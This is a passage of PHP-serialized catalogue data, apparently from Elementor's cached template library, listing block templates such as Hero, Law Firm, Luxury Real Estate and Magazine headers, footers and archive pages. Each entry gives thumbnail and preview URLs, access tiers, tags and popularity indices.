6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_white_1.png\";s:12:\"tmpl_created\";i:1520443687;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:396;s:16:\"popularity_index\";i:406;s:11:\"trend_index\";i:542;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:622;a:21:{s:4:\"tmpl\";i:530;s:2:\"id\";i:5801;s:5:\"title\";s:6:\"Hero 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_4.png\";s:12:\"tmpl_created\";i:1520443589;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:398;s:16:\"popularity_index\";i:15;s:11:\"trend_index\";i:37;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:623;a:21:{s:4:\"tmpl\";i:531;s:2:\"id\";i:5811;s:5:\"title\";s:6:\"Hero 8\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_5.png\";s:12:\"tmpl_created\";i:1520443591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:400;s:16:\"popularity_index\";i:105;s:11:\"trend_index\";i:86;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:624;a:21:{s:4:\"tmpl\";i:529;s:2:\"id\";i:5792;s:5:\"title\";s:6:\"Hero 9\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_3.png\";s:12:\"tmpl_created\";i:1520443588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:403;s:16:\"popularity_index\";i:225;s:11:\"trend_index\";i:244;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:625;a:21:{s:4:\"tmpl\";i:978;s:2:\"id\";i:13251;s:5:\"title\";s:27:\"Interior Design &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/04/404.png\";s:12:\"tmpl_created\";i:1586148737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/interior-design-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:405;s:16:\"popularity_index\";i:730;s:11:\"trend_index\";i:795;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:626;a:21:{s:4:\"tmpl\";i:979;s:2:\"id\";i:13244;s:5:\"title\";s:30:\"Interior Design &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/04/Footer.png\";s:12:\"tmpl_created\";i:1586148742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:39:\"[\"Business\",\"Footer\",\"Interior Design\"]\";s:10:\"menu_order\";i:406;s:16:\"popularity_index\";i:322;s:11:\"trend_index\";i:178;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:627;a:21:{s:4:\"tmpl\";i:980;s:2:\"id\";i:13236;s:5:\"title\";s:30:\"Interior Design &#8211; Header\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-interior-design.png\";s:12:\"tmpl_created\";i:1586148746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:39:\"[\"Business\",\"Header\",\"Interior Design\"]\";s:10:\"menu_order\";i:408;s:16:\"popularity_index\";i:146;s:11:\"trend_index\";i:64;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:628;a:21:{s:4:\"tmpl\";i:977;s:2:\"id\";i:13259;s:5:\"title\";s:36:\"Interior Design &#8211; News Archive\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Archiv-Blog.png\";s:12:\"tmpl_created\";i:1586148733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/interior-design-news-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:410;s:16:\"popularity_index\";i:436;s:11:\"trend_index\";i:132;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:629;a:21:{s:4:\"tmpl\";i:976;s:2:\"id\";i:13267;s:5:\"title\";s:35:\"Interior Design &#8211; Single News\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Post.png\";s:12:\"tmpl_created\";i:1586148728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/blocks/interior-design-single-news/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:413;s:16:\"popularity_index\";i:402;s:11:\"trend_index\";i:108;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:630;a:21:{s:4:\"tmpl\";i:975;s:2:\"id\";i:13274;s:5:\"title\";s:38:\"Interior Design &#8211; Single Project\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/04/Single-Project-.png\";s:12:\"tmpl_created\";i:1586148723;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/interior-design-single-project/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:414;s:16:\"popularity_index\";i:601;s:11:\"trend_index\";i:324;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:631;a:21:{s:4:\"tmpl\";i:1011;s:2:\"id\";i:14058;s:5:\"title\";s:36:\"Japanese restaurant &#8211; 404 page\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/06/404-Page.jpg\";s:12:\"tmpl_created\";i:1592290211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/japanese-restaurant-404-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:38:\"[\"404\",\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:416;s:16:\"popularity_index\";i:724;s:11:\"trend_index\";i:647;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:632;a:21:{s:4:\"tmpl\";i:1012;s:2:\"id\";i:14050;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1592290247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:41:\"[\"Food\",\"Footer\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:419;s:16:\"popularity_index\";i:317;s:11:\"trend_index\";i:238;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:633;a:21:{s:4:\"tmpl\";i:1013;s:2:\"id\";i:14042;s:5:\"title\";s:34:\"Japanese Restaurant &#8211; Header\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2020/06/japanese-restaurant-header.jpg\";s:12:\"tmpl_created\";i:1592290277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:41:\"[\"Food\",\"Header\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:421;s:16:\"popularity_index\";i:411;s:11:\"trend_index\";i:274;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:634;a:21:{s:4:\"tmpl\";i:914;s:2:\"id\";i:12164;s:5:\"title\";s:20:\"Law Firm &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/11/404.png\";s:12:\"tmpl_created\";i:1572846979;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/law-firm-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:24:\"[\"404\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:422;s:16:\"popularity_index\";i:704;s:11:\"trend_index\";i:716;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:635;a:21:{s:4:\"tmpl\";i:913;s:2:\"id\";i:12170;s:5:\"title\";s:23:\"Law Firm &#8211; Archiv\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/archiv.png\";s:12:\"tmpl_created\";i:1572846967;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:424;s:16:\"popularity_index\";i:431;s:11:\"trend_index\";i:294;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:636;a:21:{s:4:\"tmpl\";i:912;s:2:\"id\";i:12179;s:5:\"title\";s:23:\"Law Firm &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/footer.png\";s:12:\"tmpl_created\";i:1572846958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"Footer\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:425;s:16:\"popularity_index\";i:388;s:11:\"trend_index\";i:240;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:637;a:21:{s:4:\"tmpl\";i:911;s:2:\"id\";i:12194;s:5:\"title\";s:23:\"Law Firm &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-law-firm.png\";s:12:\"tmpl_created\";i:1572846935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"Header\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:427;s:16:\"popularity_index\";i:80;s:11:\"trend_index\";i:39;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:638;a:21:{s:4:\"tmpl\";i:910;s:2:\"id\";i:12203;s:5:\"title\";s:30:\"Law Firm &#8211; Search Archiv\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/11/search_result.png\";s:12:\"tmpl_created\";i:1572846925;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/law-firm-search-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:430;s:16:\"popularity_index\";i:493;s:11:\"trend_index\";i:433;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:639;a:21:{s:4:\"tmpl\";i:909;s:2:\"id\";i:12212;s:5:\"title\";s:28:\"Law Firm &#8211; Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/single.png\";s:12:\"tmpl_created\";i:1572846914;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/law-firm-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:432;s:16:\"popularity_index\";i:326;s:11:\"trend_index\";i:214;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:640;a:21:{s:4:\"tmpl\";i:1022;s:2:\"id\";i:14772;s:5:\"title\";s:35:\"Luxury Real Estate &#8211; 404 page\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/07/404.png\";s:12:\"tmpl_created\";i:1595315728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/blocks/luxury-real-estate-404-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:433;s:16:\"popularity_index\";i:759;s:11:\"trend_index\";i:720;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:641;a:21:{s:4:\"tmpl\";i:1023;s:2:\"id\";i:14779;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Footer.png\";s:12:\"tmpl_created\";i:1595315743;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/luxury-real-estate-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"Footer\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:434;s:16:\"popularity_index\";i:536;s:11:\"trend_index\";i:505;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:642;a:21:{s:4:\"tmpl\";i:1024;s:2:\"id\";i:14790;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Header.png\";s:12:\"tmpl_created\";i:1595315760;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/luxury-real-estate-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"Header\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:436;s:16:\"popularity_index\";i:101;s:11:\"trend_index\";i:157;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:643;a:21:{s:4:\"tmpl\";i:1026;s:2:\"id\";i:14809;s:5:\"title\";s:45:\"Luxury Real Estate &#8211; Properties Archive\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Properties.png\";s:12:\"tmpl_created\";i:1595315826;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/blocks/luxury-real-estate-properties-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:438;s:16:\"popularity_index\";i:414;s:11:\"trend_index\";i:420;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:644;a:21:{s:4:\"tmpl\";i:1027;s:2:\"id\";i:14816;s:5:\"title\";s:47:\"Luxury Real Estate &#8211; Property single post\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/07/Single-Property-.png\";s:12:\"tmpl_created\";i:1595315847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/blocks/luxury-real-estate-property-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:441;s:16:\"popularity_index\";i:541;s:11:\"trend_index\";i:665;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:645;a:21:{s:4:\"tmpl\";i:1025;s:2:\"id\";i:14799;s:5:\"title\";s:38:\"Luxury Real Estate &#8211; single post\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Post.png\";s:12:\"tmpl_created\";i:1595315792;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/luxury-real-estate-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:442;s:16:\"popularity_index\";i:369;s:11:\"trend_index\";i:441;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:646;a:21:{s:4:\"tmpl\";i:950;s:2:\"id\";i:12635;s:5:\"title\";s:20:\"Magazine &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/01/404_s.png\";s:12:\"tmpl_created\";i:1579060746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/magazine-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:25:\"[\"404\",\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:445;s:16:\"popularity_index\";i:645;s:11:\"trend_index\";i:734;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:647;a:21:{s:4:\"tmpl\";i:949;s:2:\"id\";i:12643;s:5:\"title\";s:24:\"Magazine &#8211; Archiv1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv1_s.png\";s:12:\"tmpl_created\";i:1579060737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/magazine-archiv1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:447;s:16:\"popularity_index\";i:346;s:11:\"trend_index\";i:272;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:648;a:21:{s:4:\"tmpl\";i:946;s:2:\"id\";i:12669;s:5:\"title\";s:23:\"Magazine &#8211; 